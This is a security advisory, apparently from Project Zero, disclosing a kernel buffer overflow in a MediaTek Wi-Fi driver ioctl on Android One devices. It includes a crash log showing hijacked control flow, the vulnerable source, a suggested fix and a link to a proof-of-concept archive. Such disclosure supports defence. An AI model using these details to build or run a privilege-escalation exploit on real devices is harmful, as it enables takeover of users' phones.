Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678 The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL. This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET. See hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040. [ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: GW3.10.57-g9e1c396 #1 [ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000 [ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040 [ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484 [ 56.847092]-(0)[880:tx_thread]pc : [<40404040>]lr : [<c0408be4>]psr: a0000013 [ 56.847092]sp : cb99fdb0ip : c001813cfp : cb99fe0c [ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0r9 : 0000af00r8 : 00000110 [ 56.849552]-(0)[880:tx_thread]r7 : 0000002cr6 : cc0a63c0r5 : 00000001r4 : c0cade08 [ 56.850560]-(0)[880:tx_thread]r3 : 40404040r2 : 00000040r1 : dd5d0110r0 : 00000001 [ 56.851570]-(0)[880:tx_thread]Flags: NzCvIRQs onFIQs onMode SVC_32ISA ARMSegment kernel [ 56.852675]-(0)[880:tx_thread]Control: 10c5387dTable: 9e9b006aDAC: 00000015 [ 56.853585]-(0)[880:tx_thread] [ 56.853585]LR: 0xc0408b64: [ 56.854297]8b64e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000 [ 56.855306]8b8401a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000 [ 56.856314]8ba4e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010 [ 56.857323]8bc4e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33 [ 56.858332]8be4e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000 [ 56.859340]8c04e12fff33 e59635cc e1a00007 e5933004 e12fff33 e5959000 e2899f7d e5953000 [ 56.860349]8c24e30610c0 e1a00007 
e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010 [ 56.861358]8c44e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014 [ 56.862369]-(0)[880:tx_thread] [ 56.862369]SP: 0xcb99fd30: [ 56.863083]fd3000000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110 [ 56.864091]fd500000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110 [ 56.865100]fd7000000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00 [ 56.866108]fd90c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff [ 56.867117]fdb000000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000 [ 56.868126]fdd0cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000 [ 56.869135]fdf0e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28 [ 56.870143]fe100000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14 [ 56.871155]-(0)[880:tx_thread] [ 56.871155]IP: 0xc00180bc: [ 56.871868]80bcee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 [ 56.872877]80dce203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001 [ 56.873885]80fc3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312 [ 56.874894]811ce2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e [ 56.875902]813ce0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e [ 56.876911]815c00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a [ 56.877920]817ce1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa [ 56.878929]819ce1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01 [ 56.879940]-(0)[880:tx_thread] [ 56.879940]FP: 0xcb99fd8c: [ 56.880653]fd8c0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 [ 56.881662]fdacffffffff 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 [ 56.882671]fdcc00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 [ 
56.883679]fdece54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 [ 56.884688]fe0cc0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 [ 56.885697]fe2ce54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000 [ 56.886705]fe4cc0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4 [ 56.887714]fe6cc03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540 [ 56.888726]-(0)[880:tx_thread] [ 56.888726]R1: 0xdd5d0090: [ 56.889439]009000000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193 [ 56.890447]00b0c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000 [ 56.891456]00d0ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8 [ 56.892465]00f0e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d [ 56.893473]011000000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775 [ 56.894482]013010b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc [ 56.895491]015025b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad [ 56.896499]0170a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111 [ 56.897511]-(0)[880:tx_thread] [ 56.897511]R4: 0xc0cadd88: [ 56.898224]dd88c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.899233]dda841414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.900241]ddc841414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.901250]dde841414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 [ 56.902259]de0841414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3 [ 56.903267]de28000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000 [ 56.904276]de4800000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.905285]de6800000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000 [ 56.906297]-(0)[880:tx_thread] [ 
56.906297]R6: 0xcc0a6340: [ 56.907009]634000000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358 [ 56.908018]6360df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000 [ 56.909027]638000000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000 [ 56.910035]63a000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.911044]63c0dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000 [ 56.912053]63e000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.913062]640000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.914070]642000000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000 [ 56.915082]-(0)[880:tx_thread] [ 56.915082]R10: 0xc0cac270: [ 56.915806]c2707f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000 [ 56.916814]c29000000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000 [ 56.917823]c2b000000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000 [ 56.918832]c2d000000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000 [ 56.919840]c2f000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.920849]c31000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.921858]c33000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.922866]c35000000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248) [ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000) [ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0 [ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 [ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000 [ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 
c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28 [ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 [ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0 [ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000 [ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000 [ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0 [ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8 [ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50 [ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc [ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48 [ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000 [ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead [ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000 [ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000 [ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff [ 56.948658]Backtrace: [ 56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638) [ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000 r4:e54b6168 [ 56.951190]-(0)[880:tx_thread][<c03dae10>] (nicTxCmd+0x0/0x638) from [<c03bd0f4>] 
(wlanSendCommand+0x194/0x220) [ 56.952449]-(0)[880:tx_thread][<c03bcf60>] (wlanSendCommand+0x0/0x220) from [<c03bd540>] (wlanProcessCommandQueue+0x24c/0x474) [ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001 [ 56.954568]-(0)[880:tx_thread][<c03bd2f4>] (wlanProcessCommandQueue+0x0/0x474) from [<c03efce4>] (tx_thread+0x310/0x640) [ 56.955927]-(0)[880:tx_thread][<c03ef9d4>] (tx_thread+0x0/0x640) from [<c008fadc>] (kthread+0xbc/0xc0) [ 56.957088]-(0)[880:tx_thread][<c008fa20>] (kthread+0x0/0xc0) from [<c000e618>] (ret_from_fork+0x14/0x3c) [ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc [ 56.958970]-(0)[880:tx_thread]Code: bad PC value [ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]--- [ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632 case PRIV_CMD_SW_CTRL: pu4IntBuf = (PUINT_32)prIwReqData->data.pointer; prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0]; //kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8); if (copy_from_user(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, prIwReqData->data.length)) { status = -EFAULT; break; } prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL; prNdisReq->inNdisOidlength = 8; prNdisReq->outNdisOidLength = 8; /* Execute this OID */ status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen); break; prNdisReq->ndisOidContent lives in a static allocation of size 0x1000, while prIwReqData->data.length is a user-controlled unsigned short that is never checked against that size before the copy, so a copy_from_user with a length larger than the buffer writes past its end and corrupts kernel memory. The commented-out kalMemCopy and the fixed inNdisOidlength = 8 suggest the intended copy was a fixed 8 bytes; the fix is to bound the copied length to the buffer (or to the expected 8 bytes) before calling copy_from_user. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip